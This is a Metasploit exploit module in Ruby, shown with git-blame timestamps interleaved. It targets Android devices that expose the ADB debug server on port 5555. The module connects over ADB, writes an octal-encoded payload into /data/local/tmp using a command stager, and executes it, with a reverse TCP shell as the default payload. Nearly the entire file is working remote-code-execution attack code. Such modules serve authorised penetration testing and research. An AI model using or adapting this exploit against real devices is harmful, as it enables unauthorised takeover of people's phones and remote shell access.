metasploit-framework/modules/exploits/android/adb/adb_server_exec.rb

79 lines
2.1 KiB
Ruby
Raw Normal View History

2016-01-02 20:13:54 +00:00
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex/proto/adb/client'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Android ADB Debug Server Remote Payload Execution',
2016-01-02 20:13:54 +00:00
'Description' => %q{
2016-01-03 04:41:38 +00:00
Writes and spawns a native payload on an android device that is listening
2016-01-02 20:13:54 +00:00
for adb debug messages.
},
'Author' => ['joev'],
'License' => MSF_LICENSE,
2016-01-03 04:41:38 +00:00
'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/shell_reverse_tcp' },
2016-01-02 20:13:54 +00:00
'Platform' => 'linux',
'Arch' => ARCH_ALL,
'Targets' => [ ['Automatic', {}] ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 01 2016'
))
register_options([
Opt::RPORT(5555),
OptString.new('WritableDir', [true, 'Writable directory', '/data/local/tmp/'])
], self.class)
end
def check
2016-01-03 04:41:38 +00:00
setup_adb_connection do
device_info = @adb_client.connect.data
2016-01-02 20:13:54 +00:00
print_good "Detected device:\n#{device_info}"
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Unknown
end
def execute_command(cmd, opts)
2016-01-03 04:41:38 +00:00
response = @adb_client.exec_cmd(cmd)
2016-01-02 20:13:54 +00:00
print_good "Command executed, response:\n #{response}"
end
def exploit
2016-01-03 04:41:38 +00:00
setup_adb_connection do
device_data = @adb_client.connect
2016-01-02 20:13:54 +00:00
print_good "Connected to device:\n#{device_data.data}"
execute_cmdstager({
:flavor => :echo,
:enc_format => :octal,
:prefix => '\\\\0',
:temp => datastore['WritableDir'],
:linemax => Rex::Proto::ADB::Message::Connect::DEFAULT_MAXDATA-8
2016-01-02 20:13:54 +00:00
})
end
end
2016-01-03 04:41:38 +00:00
def setup_adb_connection(&blk)
begin
print_status "Connecting to device..."
connect
@adb_client = Rex::Proto::ADB::Client.new(sock)
blk.call
ensure
disconnect
end
2016-01-02 20:13:54 +00:00
end
end